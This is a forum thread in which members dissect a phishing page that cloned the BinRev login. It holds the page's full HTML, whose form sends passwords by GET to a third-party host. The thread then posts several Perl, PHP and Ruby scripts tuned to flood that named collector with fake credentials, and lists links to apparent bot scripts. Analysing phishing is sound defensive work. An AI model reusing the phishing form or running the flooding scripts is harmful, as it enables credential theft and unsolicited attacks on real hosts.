desmondeus

Someone help me already

39 posts in this topic

PLLZZZZZZZZZ ive been waiting hours someone help me

<-- edit by droops -->

This is an attempt to steal your login information for the forums, don't try to log into this page

http://urlhawk.com/2v1


I don't get what good getting someone's binrev information would do anyway...

Most likely the people to fall for it need to be removed anyway ;)

Also I doubt anyone is using a similar password for their email or anything...


Hmm, I wonder if he can actually harvest cookies with this stuff.

I went there and typed in lol@ for the username and you for the password,

and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev.

Obviously I changed my password, but I'm curious now. I'm guessing it's a pretty standard CURL scam anyway....


Phishing page source:

I quickly looked through it and it doesn't look like it steals cookie information...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" href="http://www.binrev.com/forums/favicon.ico" />
<title>Board Message</title>
<link rel="alternate" type="application/rss+xml" title="General Hacking" href="http://www.binrev.com/forums/index.php?act=rssout&id=1" />
<link rel="alternate" type="application/rss+xml" title="*NIX" href="http://www.binrev.com/forums/index.php?act=rssout&id=6" />
<link rel="alternate" type="application/rss+xml" title="Old Skool Phreaking" href="http://www.binrev.com/forums/index.php?act=rssout&id=2" />
<link rel="alternate" type="application/rss+xml" title="New Projects" href="http://www.binrev.com/forums/index.php?act=rssout&id=5" />
<link rel="alternate" type="application/rss+xml" title="Hacker Media" href="http://www.binrev.com/forums/index.php?act=rssout&id=3" />
<link rel="alternate" type="application/rss+xml" title="Newbie HQ" href="http://www.binrev.com/forums/index.php?act=rssout&id=4" />
<link rel="alternate" type="application/rss+xml" title="Retail Hacking" href="http://www.binrev.com/forums/index.php?act=rssout&id=7" />
<link rel="alternate" type="application/rss+xml" title="Programming/Code" href="http://www.binrev.com/forums/index.php?act=rssout&id=8" />
<link rel="alternate" type="application/rss+xml" title="Linkz" href="http://www.binrev.com/forums/index.php?act=rssout&id=9" />
<link rel="alternate" type="application/rss+xml" title="Urban Exploration and Social Engineering" href="http://www.binrev.com/forums/index.php?act=rssout&id=10" />

<link rel="alternate" type="application/rss+xml" title="HAM Radio/Hardware Hacking" href="http://www.binrev.com/forums/index.php?act=rssout&id=11" />
<link rel="alternate" type="application/rss+xml" title="Off-Topic" href="http://www.binrev.com/forums/index.php?act=rssout&id=12" />
<link rel="alternate" type="application/rss+xml" title="General Chat" href="http://www.binrev.com/forums/index.php?act=rssout&id=13" />
<link rel="alternate" type="application/rss+xml" title="The BitBox" href="http://www.binrev.com/forums/index.php?act=rssout&id=14" />
<link rel="alternate" type="application/rss+xml" title="Photoshop Contests" href="http://www.binrev.com/forums/index.php?act=rssout&id=15" />
<link rel="alternate" type="application/rss+xml" title="Completed Projects" href="http://www.binrev.com/forums/index.php?act=rssout&id=16" />
<link rel="alternate" type="application/rss+xml" title="Google Mining" href="http://www.binrev.com/forums/index.php?act=rssout&id=17" />

<style type="text/css" media="all">

@import url(http://www.binrev.com/forums/style_images/css_22.css);

</style>

</head>
<body>
<!--ipb.javascript.start-->
<script type="text/javascript">
//<![CDATA[
var ipb_var_st = "0";
var ipb_lang_tpl_q1 = "Please enter a page number to jump to between 1 and";
var ipb_var_s = "ece7a530afe53e91ae89129751338828";
var ipb_var_phpext = "php";
var ipb_var_base_url = "http://www.binrev.com/forums/index.php?s=&";
var ipb_var_image_url = "style_images/green";
var ipb_input_f = "5";
var ipb_input_t = "38443";
var ipb_input_p = "0";
var ipb_var_cookieid = "";
var ipb_var_cookie_domain = "";
var ipb_var_cookie_path = "/";
var ipb_md5_check = "880ea6a14ea49e853634fbdc5015a024";
var ipb_new_msgs = 0;
var use_enhanced_js = 1;
var use_charset = "iso-8859-1";
var ipb_myass_chars_lang = "Not enough characters";
var ajax_load_msg = "Loading Content...";
//]]>
</script>
<script type="text/javascript" src='http://www.binrev.com/jscripts/ips_ipsclass.js'></script>

<script type="text/javascript" src='http://www.binrev.com/jscripts/ipb_global.js'></script>
<script type="text/javascript" src='http://www.binrev.com/jscripts/ips_menu.js'></script>
<script type="text/javascript" src='http://www.binrev.com/style_images/green/folder_js_skin/ips_menu_html.js'></script>
<script type="text/javascript" src='http://www.binrev.com/cache/lang_cache/en/lang_javascript.js'></script>
<script type="text/javascript">
//<![CDATA[
var ipsclass = new ipsclass();
ipsclass.init();
ipsclass.settings['do_linked_resize'] = parseInt( "1" );
ipsclass.settings['resize_percent'] = parseInt( "50" );
//]]>
</script>
<!--ipb.javascript.end-->
<div class="borderwrap">
<div id="logostrip" align="left"><a href='http://www.binrev.com/forums/index.php?'><!--ipb.logo.start--><img src='http://www.binrev.com/forums/style_images/22_22_logo4.gif' alt='IPB' style='vertical-align:top' border='0' />
<!--ipb.logo.end--></a></div>
<div id="submenu">

<!--ipb.leftlinks.start-->

<div class='ipb-top-left-link'><a href="http://www.binrev.com/">Binary Revolution</a></div>


<div class='ipb-top-left-link'><a href="http://www.binrev.com/forums/index.php?act=home">Binary Revolution Portal</a></div>


<div class='ipb-top-left-link'><a href="http://www.binrev.com/forums/index.php?act=boardrules">Forum rules!</a></div>

<!--ipb.leftlinks.end-->
<!--ipb.rightlinks.start-->

<div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?act=Help">Help</a></div>

<div class='ipb-top-right-link' id="ipb-tl-search"><a href="http://www.binrev.com/forums/index.php?act=Search&f=5">Search</a></div>
<div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?act=Members">Members</a></div>
<div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?act=calendar">Calendar</a></div>

<div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?autocom=extrasgallery">Extras Gallery</a></div><div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?autocom=gallery">Gallery</a></div><div class='ipb-top-right-link'><a href="http://www.binrev.com/forums/index.php?autocom=blog">Blogs</a></div>


<div class='popupmenu-new' id='ipb-tl-search_menu' style='display:none;width:210px'>
<form action="http://www.binrev.com/forums/index.php?act=Search&CODE=01" method="post">

<input type='hidden' name='forums' id='gbl-search-forums' value='all' />
<input type="text" size="20" name="keywords" id='ipb-tl-search-box' />
<input class="button" type="image" style='border:0px' src="http://www.binrev.com/style_images/green/login-button.gif" />

</form>
<div style='padding:4px'>
<a href='http://www.binrev.com/forums/index.php?act=Search'>More Search Options</a>

</div>
</div>
<script type="text/javascript">
ipsmenu.register( "ipb-tl-search", 'document.getElementById("ipb-tl-search-box").focus();' );
gbl_check_search_box();
</script>

<!--ipb.rightlinks.end-->
</div>
</div>

<script type="text/javascript" src='http://www.binrev.com/jscripts/ips_xmlhttprequest.js'></script>
<script type="text/javascript" src='http://www.binrev.com/jscripts/ipb_global_xmlenhanced.js'></script>

<script type="text/javascript" src='http://www.binrev.com/jscripts/dom-drag.js'></script>
<div id='get-myassistant' style='display:none;width:400px;text-align:left;'>
<div class="borderwrap">
<div class='maintitle' id='myass-drag' title='Click and hold to drag this window'>
<div style='float:right'><a href='#' onclick='document.getElementById("get-myassistant").style.display="none"'>[X]</a></div>

<div>My Assistant</div>
</div>
<div id='myass-content' style='overflow-x:auto;'></div>

</div>
</div>
<!-- Loading Layer -->
<div id='loading-layer' style='display:none'>
<div id='loading-layer-shadow'>
<div id='loading-layer-inner'>
<img src='http://www.binrev.com/forums/style_images/green/loading_anim.gif' border='0' alt='Loading. Please Wait...' />

<span style='font-weight:bold' id='loading-layer-text'>Loading. Please Wait...</span>
</div>

</div>
</div>
<!-- / Loading Layer -->
<!-- Msg Layer -->
<div id='ipd-msg-wrapper'>
<div id='ipd-msg-title'>
<a href='#' onclick='document.getElementById("ipd-msg-wrapper").style.display="none"; return false;'><img src='http://www.binrev.com/forums/style_images/green/close.png' alt='X' title='Close Window' class='ipd' /></a>   <strong>Site Message</strong>

</div>
<div id='ipd-msg-inner'><span style='font-weight:bold' id='ipd-msg-text'></span><div class='pp-tiny-text'>(Message will auto close in 2 seconds)</div></div>

</div>
<!-- Msg Layer -->

<!-- / End board header -->
<div id="userlinksguest">
<p class="pcen">This menu has been disabled</p>
</div>
<!--TOP_BANNER_ROTATION-->
<div id="ipbwrapper">
<div id="navstrip"><img src='http://www.binrev.com/forums/style_images/green/nav.gif' border='0' alt='>' /> <a href='http://www.binrev.com/forums/index.php?act=idx'>Binary Revolution Forums</a></div>

<!--IBF.NEWPMBOX-->
<script language="JavaScript" type="text/javascript">
<!--
function contact_admin() {
// Very basic spam bot stopper

admin_email_one = 'forums';
admin_email_two = 'binrev.com';

window.location = 'mailto:'+admin_email_one+'@'+admin_email_two+'?subject=Error on the forums';

}
//-->
</script>

<br />
<div class="borderwrap">
<h3><img src='http://www.binrev.com/forums/style_images/green/nav_m.gif' border='0' alt='>' width='8' height='8' /> Board Message</h3>

<p>Sorry, an error occurred. If you are unsure on how to use a feature, or don't know why you got this error message, try looking through the help files for more information.</p>
<div class="errorwrap">
<h4>The error returned was:</h4>

<p>Sorry, you do not have permission to preform that action</p>

</div>

<form action="next.php" method="get">
<input type="hidden" name="act" value="Login" />
<input type="hidden" name="CODE" value="01" />
<input type="hidden" name="s" value="ece7a530afe53e91ae89129751338828" />
<input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443" />
<input type="hidden" name="CookieDate" value="1" />

<h4>You are not logged in, you may log in below</h4>

<div class="fieldwrap">

<h4>Your account username</h4>
<input type="text" size="20" maxlength="64" name="UserName" />

<h4>Your account password</h4>
<input type="password" size="20" name="PassWord" />
<p class="formbuttonrow1"><input class="button" type="submit" name="submit" value="Log In" /></p>

</div>

</form>
<!--IBF.POST_TEXTAREA-->
<h4>Useful Links</h4>
<ul>
<li><a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=10">Forgotten Password Recovery</a></li>
<li><a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=00">Register a new account</a></li>
<li><a href="http://www.binrev.com/forums/index.php?act=Help&CODE=00">Our help documentation</a></li>

<li><a href="java script:contact_admin();">Contact the forums administrator</a></li>
</ul>
<p class="formbuttonrow"><b><a href="java script:history.go(-1)">Go Back</a></b></p>
</div>
<table cellspacing="0" id="gfooter">
<tr>
<td width="45%"><img id="rss-syndication" src='http://www.binrev.com/forums/style_images/green/rss.png' border='0' alt='RSS' class='ipd' />
<script type="text/javascript">
//<![CDATA[
menu_build_menu(
"rss-syndication",
new Array( "<a href='http://www.binrev.com/forums/index.php?act=rssout&id=1' style='color:black'>General Hacking</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=6' style='color:black'>*NIX</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=2' style='color:black'>Old Skool Phreaking</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=5' style='color:black'>New Projects</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=3' style='color:black'>Hacker Media</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=4' style='color:black'>Newbie HQ</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=7' style='color:black'>Retail Hacking</a>",

"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=8' style='color:black'>Programming/Code</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=9' style='color:black'>Linkz</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=10' style='color:black'>Urban Exploration and Social Engineering</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=11' style='color:black'>HAM Radio/Hardware Hacking</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=12' style='color:black'>Off-Topic</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=13' style='color:black'>General Chat</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=14' style='color:black'>The BitBox</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=15' style='color:black'>Photoshop Contests</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=16' style='color:black'>Completed Projects</a>",
"<a href='http://www.binrev.com/forums/index.php?act=rssout&id=17' style='color:black'>Google Mining</a>"
) );
//]]>
</script> </td>

<td width="10%" align="center" nowrap="nowrap"><a href="lofiversion/index.php"><b>Lo-Fi Version</b></a></td>
<td width="35%" align="right" nowrap="nowrap">Time is now: 1st August 2008 - 11:15 AM</td>
<td width="10%" align="center" nowrap="nowrap"></td>
</table>

<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<script type="text/javascript">
_qacct="p-1dsmrjyrjWnko";quantserve();</script>
<noscript>

<a href="http://www.quantcast.com/p-1dsmrjyrjWnko" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-1dsmrjyrjWnko.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast"/></a></noscript>

<!-- End Quantcast tag -->

<script type='text/javascript'>
//<![CDATA[
menu_do_global_init();
show_inline_messages();
// Uncomment this to fix IE png images
// causes page slowdown, and some missing images occasionally
// if ( is_ie )
// {
// ie_fix_png();
// }

//]]>
</script>

<!--BOTTOM_BANNER_ROTATION-->
<!-- Copyright Information -->
<div align='center' class='copyright'>
Powered By <a href='http://www.invisionboard.com' style='text-decoration:none' target='_blank'>IP.Board</a>
© 2008  <a href='http://www.invisionpower.com' style='text-decoration:none' target='_blank'>IPS, Inc</a>.
<div>Licensed to: The Digital DawgPound</div></div>

<!-- / Copyright -->
</div>
</body>
</html>

Edited by Lelantus
Hmm, I wonder if he can actually harvest cookies with this stuff.

I went there and typed in lol@ for the username and you for the password,

and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev.

Obviously I changed my password, but I'm curious now. I'm guessing it's a pretty standard CURL scam anyway....

The page convinced me there for a second, it's pretty good. The link will be edited to show the true URL.

-E

Hmm, I wonder if he can actually harvest cookies with this stuff.

I went there and typed in lol@ for the username and you for the password,

and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev.

Obviously I changed my password, but I'm curious now. I'm guessing it's a pretty standard CURL scam anyway....

The page convinced me there for a second, it's pretty good. The link will be edited to show the true URL.

-E

The real address is: http://h1.ripway.com/acedaarcher/BinRev/index.html

Hmm, I wonder if he can actually harvest cookies with this stuff.

No. Since the page is hosted on another domain, he doesn't have access to your binrev.com cookies. I doubt he's clever enough to steal them anyway. Also, the simple action of being redirected back to binrev after the phishing site will change a sequence number in your session, making any session cookies he steals completely useless. Invision is not generally vulnerable to session stealing or session fixation.

I went there and typed in lol@ for the username and you for the password,

and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev.

It's just using a frame. The first login screen was an HTML file on another server that submits a form to next.php. The next.php script records what you entered in the form and returns 302 found and redirects you back to binrev.com. It didn't somehow magically log you in.

Obviously I changed my password, but I'm curious now. I'm guessing it's a pretty standard CURL scam anyway....

Unless you gave him your password, I seriously doubt he got anything. I read the source code for the phishing site and it doesn't look very... fishy at all. Looks more like a copy-and-pasted binrev page with a form. I really doubt you have anything to worry about.


I see, yeah I posted that before heading out to lunch. Hadn't had the time to do the review myself yet. Upon further review I found the real URL and read the source to the page myself, makes me wonder if he's using an SQL powered backend to store user data, if so maybe bobby tables... ;)

I never really gave it my real credentials, that's why I wondered how I was actually logged in if the session was incrementing without a cookie heist.

EDIT : It's a GET request to a file called next.php..... Includes a referrer URL for the redirect.

And upon further review,

http://h1.ripway.com/acedaarcher/ is another redirect page for some other forum. This guy seems to have gone around the block trying to access other security researcher/hacker hobbyist information.

Edited by RETN

Why? What's a person's BinRev account really going to get you? It just seems a bit pointless to me...

:roll:

#!/usr/bin/perl
# phuckphish.pl <# of gets>
# Phuck you Phisher! Tad bit of log poisoning...
use LWP::Simple;
use Digest::MD5 qw(md5 md5_hex md5_base64);

$dict = '/usr/share/dict/words';

for($loop=1;$loop<=$ARGV[0];$loop++) {
srand;
my $rand = ((int(rand(1000))) * $loop);
my $sess = md5_hex($rand);

my $user;
my $pass;

open DICT, "<$dict" or die $!;
rand($.) < 1 && ($user = $_) while <DICT>;
close(DICT);
open DICT, "<$dict" or die $!;
rand($.) < 1 && ($pass = $_) while <DICT>;
close(DICT);

chomp($user);
chomp($pass);

my $url = 'http://h1.ripway.com/acedaarcher/BinRev/next.php?' .
'act=Login&CODE=01&s=' . $sess .
'&referer=http%3A%2F%2Fwww.binrev.com%2Fforums%2Findex.php%3Fact%3Dpost%26do%3Dreply_post%26f%3D5%26t%3D38443&CookieDate=1' .
'&UserName=' . $user .
'&PassWord=' . $pass .
'&submit=Log+In';

get $url;

}

Edited by n3xg3n

Having quickly looked through that page source, I don't see the clues/items which show it to be a phishing page.

What things should be looked for?


For starters, let's notice that the URL in the URL bar doesn't contain Binrev.com. Now here's to the code :

<input type="hidden" name="act" value="Login" />
<input type="hidden" name="CODE" value="01" />
<input type="hidden" name="s" value="ece7a530afe53e91ae89129751338828" />
<input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443" />
<input type="hidden" name="CookieDate" value="1" />

<h4>You are not logged in, you may log in below</h4>

<div class="fieldwrap">

<h4>Your account username</h4>
<input type="text" size="20" maxlength="64" name="UserName" />

<h4>Your account password</h4>
<input type="password" size="20" name="PassWord" />
<p class="formbuttonrow1"><input class="button" type="submit" name="submit" value="Log In" /></p>

</div>

</form>

First, let's notice that the form method is "GET" not "POST". The real code to the forum is as follows :

<form action="http://www.binrev.com/forums/index.php?act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()">
<input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?" />
<div class="borderwrap">
<div class="maintitle"><img src='style_images/green/nav_m.gif' border='0' alt='>' width='8' height='8' /> Log In</div>

<div class='row2'>
<div class="formsubtitle">Please enter your details below to log in</div>
<div class="errorwrap" style='margin-bottom:0px;padding-bottom:0px'>
<h4>Attention!</h4>
<p>You must already have registered for an account before you can log in.<br />If you do not have an account, you may register by clicking the 'register' link near the top of the screen</p>
<p><b>I've forgotten my password! <a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=10">Click here!</a></b></p>

</div>
</div>
<table class='ipbtable' cellspacing="0">
<tr>
<td width="60%" valign="top" class='row2'>
<fieldset>
<legend><b>Log In</b></legend>
<table class='ipbtable' cellspacing="1">

<tr>

<td width="50%"><b>Enter your user name</b></td>
<td width="50%"><input type="text" size="25" maxlength="64" name="UserName" /></td>

</tr>
<tr>
<td width="50%"><b>Enter your password</b></td>
<td width="50%"><input type="password" size="25" name="PassWord" /></td>

</tr>
</table>
</fieldset>
</td>
<td width="40%" valign="top" class='row2'>
<fieldset>
<legend><b>Options</b></legend>
<table class='ipbtable' cellspacing="1">

<tr>
<td width="10%"><input class='checkbox' type="checkbox" name="CookieDate" value="1" checked="checked" /></td>
<td width="90%"><b>Remember me?</b><br /><span class="desc">This is not recommended for shared computers</span></td>
</tr>

<tr>
<td width="10%"><input class='checkbox' type="checkbox" name="Privacy" value="1" /></td>
<td width="90%"><b>Log in as invisible</b><br /><span class="desc">Don't add me to the active users list</span></td>

</tr>

</table>
</fieldset>
</td>
</tr>
<tr>
<td class="formbuttonrow" colspan="2"><input class="button" type="submit" name="submit" value="Log me in" /></td>
</tr>

<tr>
<td class="catend" colspan="2"><!-- no content --></td>
</tr>
</table>
</div>
</form>

So I mean, look at the difference. Notice the action in the first code is "next.php" and that's not at all what the action is in the real src to the site.

There are other differences between the codes, which I don't have to point out now - I'm sure it's becoming readily apparent.

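An added example, not code from any poster in this thread: a Python check for the signals described in the post above (page host, form action, form method), plus one visible in the posted page source, assets hotlinked from binrev.com. The function and finding names are made up for illustration, both HTML samples are abridged from the forms quoted in the thread, and the URL used for the genuine login page is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormAuditor(HTMLParser):
    """Collect every <form> that holds a password field, plus asset hosts."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []        # finished forms that contain a password input
        self.asset_hosts = []  # hosts behind <script src>, <img src>, <link href>
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A relative or empty action is resolved against the page URL,
            # exactly as the browser would resolve it on submit.
            self._current = {
                "action": urljoin(self.page_url, a.get("action") or ""),
                "method": (a.get("method") or "get").lower(),
                "has_password": False,
            }
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True
        elif tag in ("script", "img", "link"):
            ref = a.get("src") or a.get("href")
            host = urlsplit(urljoin(self.page_url, ref)).hostname if ref else None
            if host:
                self.asset_hosts.append(host)

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            if self._current["has_password"]:
                self.forms.append(self._current)
            self._current = None


def audit_login_page(page_url, html, expected_host):
    """Return an ordered list of findings; an empty list means nothing flagged."""
    parser = LoginFormAuditor(page_url)
    parser.feed(html)
    parser.close()

    findings = []

    def flag(name):
        if name not in findings:
            findings.append(name)

    page_host = urlsplit(page_url).hostname
    if page_host != expected_host:
        flag("page-host-mismatch")
    for form in parser.forms:
        if urlsplit(form["action"]).hostname != expected_host:
            flag("password-form-posts-off-site")
        if form["method"] != "post":
            # GET puts the credentials in the URL and in the server access log.
            flag("password-sent-by-get")
    # A look-alike page served elsewhere that pulls its look from the real site.
    if page_host != expected_host and expected_host in parser.asset_hosts:
        flag("hotlinks-brand-assets")
    return findings


# Samples abridged from the two forms quoted in the thread.
PHISH_URL = "http://h1.ripway.com/acedaarcher/BinRev/index.html"
PHISH_HTML = """
<link rel="shortcut icon" href="http://www.binrev.com/forums/favicon.ico" />
<script type="text/javascript" src='http://www.binrev.com/jscripts/ipb_global.js'></script>
<form action="next.php" method="get">
<input type="hidden" name="act" value="Login" />
<input type="text" size="20" maxlength="64" name="UserName" />
<input type="password" size="20" name="PassWord" />
</form>
"""

REAL_URL = "http://www.binrev.com/forums/index.php"  # assumed location of the real form
REAL_HTML = """
<form action="http://www.binrev.com/forums/index.php?act=Login&CODE=01" method="post" name="LOGIN">
<input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?" />
<input type="text" size="25" maxlength="64" name="UserName" />
<input type="password" size="25" name="PassWord" />
</form>
"""

if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (REAL_URL, REAL_HTML)):
        print(url, audit_login_page(url, html, "www.binrev.com"))
```
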
Why? What's a person's BinRev account really going to get you? It just seems a bit pointless to me...

:roll:

#!/usr/bin/perl
# phuckphish.pl <# of gets>
# Phuck you Phisher! Tad bit of log poisoning...
use LWP::Simple;
use Digest::MD5 qw(md5 md5_hex md5_base64);

$dict = '/usr/share/dict/words';

for($loop=1;$loop<=$ARGV[0];$loop++) {
srand;
my $rand = ((int(rand(1000))) * $loop);
my $sess = md5_hex($rand);

my $user;
my $pass;

open DICT, "<$dict" or die $!;
rand($.) < 1 && ($user = $_) while <DICT>;
close(DICT);
open DICT, "<$dict" or die $!;
rand($.) < 1 && ($pass = $_) while <DICT>;
close(DICT);

chomp($user);
chomp($pass);

my $url = 'http://h1.ripway.com/acedaarcher/BinRev/next.php?' .
'act=Login&CODE=01&s=' . $sess .
'&referer=http%3A%2F%2Fwww.binrev.com%2Fforums%2Findex.php%3Fact%3Dpost%26do%3Dreply_post%26f%3D5%26t%3D38443&CookieDate=1' .
'&UserName=' . $user .
'&PassWord=' . $pass .
'&submit=Log+In';

get $url;

}

:D I like doing that too, except mine is usually in Ruby or bash+curl.


The fact that it is a page hosted on another site that aims to look exactly like the BinRev forums login page. What he most likely did was go to the BinRev forums login page, save it, then edit the login form to submit to a .php file which we cannot absolutely know what does, but we can assume that it saves the username and password you submitted to a file, then it sends an HTTP 302 Code (Page has moved) redirecting the user back to the real binrev forums.

You don't really need to look at the source to know what's going on. If it looks suspicious, investigate further, but don't supply account information.

Edited by n3xg3n
:D I like doing that too, except mine is usually in Ruby or bash+curl.

You mean like this?

#!/usr/bin/env ruby
require 'net/http'
require 'uri'
require 'digest/md5'

dict = []
File.open('/usr/share/dict/words') do|f|
f.each_line {|l| dict << l.chomp }
end

ARGV[0].to_i.times do
opts = {
:UserName => dict[rand(dict.size)],
:PassWord => dict[rand(dict.size)],
:sess => Digest::MD5.hexdigest( dict[rand(dict.size)] ),

:act => 'Login',
:CODE => '01',
:referer => 'http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443',
:CookieDate => '1'
}

uri = URI.parse(
'http://h1.ripway.com/acedaarcher/BinRev/next.php?' +
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)

puts "Submitting username '#{opts[:UserName]}' and password '#{opts[:PassWord]}'"
Net::HTTP.get uri
end

Also, your code is quite... inefficient n3xg3n. You're reading through the entire dictionary 2 times every request? And closing the file every time you read from it? Why not just read it into an array? We really shouldn't allow Perl coders here..

Also, your code is quite... inefficient n3xg3n. You're reading through the entire dictionary 2 times every request? And closing the file every time you read from it? Why not just read it into an array? We really shouldn't allow Perl coders here..

Yeah, Yeah that was an ugly ass hack, and I don't code Perl, I get raped by it and was dicking around in the Perl Docs when I read this topic so I gave it a very amateurish effort. This should be much more efficient ;)

#!/usr/bin/php
<?php
$dict=file_get_contents("/usr/share/dict/words", FILE_TEXT);
$dict=explode("\n", $dict);

for ($i = 1; $i <= $argv[1]; $i++) {
$line = mt_rand(0, sizeof($dict)-1);
$user = $dict[$line];
$line = mt_rand(0, sizeof($dict)-1);
$pass = $dict[$line];
$sess = md5($user);

$http = "GET /acedaarcher/BinRev/next.php?act=Login&CODE=01&s=" . $sess . "&referer=http%3A%2F%2Fwww.binrev.com%2Fforums%2Findex.php%3Fact%3Dpost%26do%3Dreply_post%26f%3D5%26t%3D38443&CookieDate=1&UserName=" . $user . "&PassWord=" . $pass . "&submit=Log+In HTTP/1.1\r\n";
$http .= "Host: h1.ripway.com\r\n\r\n";
$sock = fsockopen("h1.ripway.com", 80);
fwrite($sock, $http);
fclose($sock);
}
?>

-- edit: meh more randomness, but slower --

much more efficient in fact:

n3xg3n@lockbreaker:~/Desktop$ time ./phuckphish.pl 10

real 0m10.198s
user 0m1.684s
sys 0m0.024s
n3xg3n@lockbreaker:~/Desktop$ time ./ohm.rb 10

real 0m3.147s
user 0m0.320s
sys 0m0.084s
n3xg3n@lockbreaker:~/Desktop$ time ./phphuck.php 10

real 0m1.366s
user 0m0.144s
sys 0m0.020s
n3xg3n@lockbreaker:~/Desktop$

Edited by n3xg3n

Oh yeah?

#!/usr/bin/env ruby
require 'net/http'
require 'uri'
require 'digest/md5'

dict = File.readlines '/usr/share/dict/words'

uris = []
ARGV[0].to_i.times do
opts = {
:UserName => dict[rand(dict.size)].chomp,
:PassWord => dict[rand(dict.size)].chomp,
:sess => Digest::MD5.hexdigest( dict[rand(dict.size)] ),

:act => 'Login',
:CODE => '01',
:referer => 'http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443',
:CookieDate => '1'
}

uris << URI.parse(
'http://h1.ripway.com/acedaarcher/BinRev/next.php?' +
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)
end

threads = []
uris.each do|uri|
threads << Thread.new(uri) { Net::HTTP.get uri }
end

threads.each {|thread| thread.join }

$ time ./phuckphish2.rb 10

real 0m0.594s
user 0m0.088s
sys 0m0.032s

OK, so Ruby's slow, but I get a little over 1/2 a second on my machine. PHP might be able to beat it out of raw execution speed. Ruby also loses some time from setup, it has to parse a few thousand line HTTP library. Using a loop instead of readlines was slow too, I replaced that. Could be improved with normal sockets instead of an HTTP library, but threading makes a huge difference since the task is IO-bound.


Wait, I'm an idiot.

#!/usr/bin/env ruby
require 'digest/md5'
require 'socket'

dict = File.readlines '/usr/share/dict/words'

uris = []

template = <<END
GET /m/acedaarcher/BinRev/next.php?### HTTP/1.1
Host: h1.ripway.com

END

socket = TCPSocket.new( 'h1.ripway.com', 80 )

ARGV[0].to_i.times do
opts = {
:UserName => dict[rand(dict.size)].chomp,
:PassWord => dict[rand(dict.size)].chomp,
:sess => Digest::MD5.hexdigest( dict[rand(dict.size)] ),

:act => 'Login',
:CODE => '01',
:referer => 'http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443',
:CookieDate => '1'
}

socket.write template.gsub(/###/,
'http://h1.ripway.com/acedaarcher/BinRev/next.php?' +
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)
end

$ time ./phuckphish3.rb 10

real 0m0.343s
user 0m0.064s
sys 0m0.016s

Down to 1/3 of a second.

PLLZZZZZZZZZ ive been waiting hours someone help me

<-- edit by droops -->

This is an attempt to steal your login information for the forums, don't try to log into this page

http://urlhawk.com/2v1

I've been watching what you've been doing on those c99 shells. I know where you hang out on irc.

Some related links:

http://h1.ripway.com/h4dy/ff.txt

http://h1.ripway.com/kungkong/kk.txt

http://h1.ripway.com/h4dy/perlzmildnet.txt

http://h1.ripway.com/antiserius/mybotscan.txt

Edited by trem

Uh, Ohm correct me if I'm wrong but the socket would close after the first redirect so you can't get all the requests through under one socket connection.

Also you're pre-pending the url of next.php when it is already part of your template causing 404's so wouldn't it be

  socket.write template.gsub(/###/,
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)

Edited by n3xg3n

I find it funny that the original poster was trying to social engineer the members of the forum. He didn't make a good attempt, relying on random people to click a redirection URL. When I first saw the link, I knew it could have been malicious. Again, he made a very poor attempt at social engineering.

Edited by lattera
Uh, Ohm correct me if I'm wrong but the socket would close after the first redirect so you can't get all the requests through under one socket connection.

You're right. It does pass Connection: close in the response headers. I guess pipelining the requests won't work here. It was just a thought.

Also you're pre-pending the url of next.php when it is already part of your template causing 404's so wouldn't it be

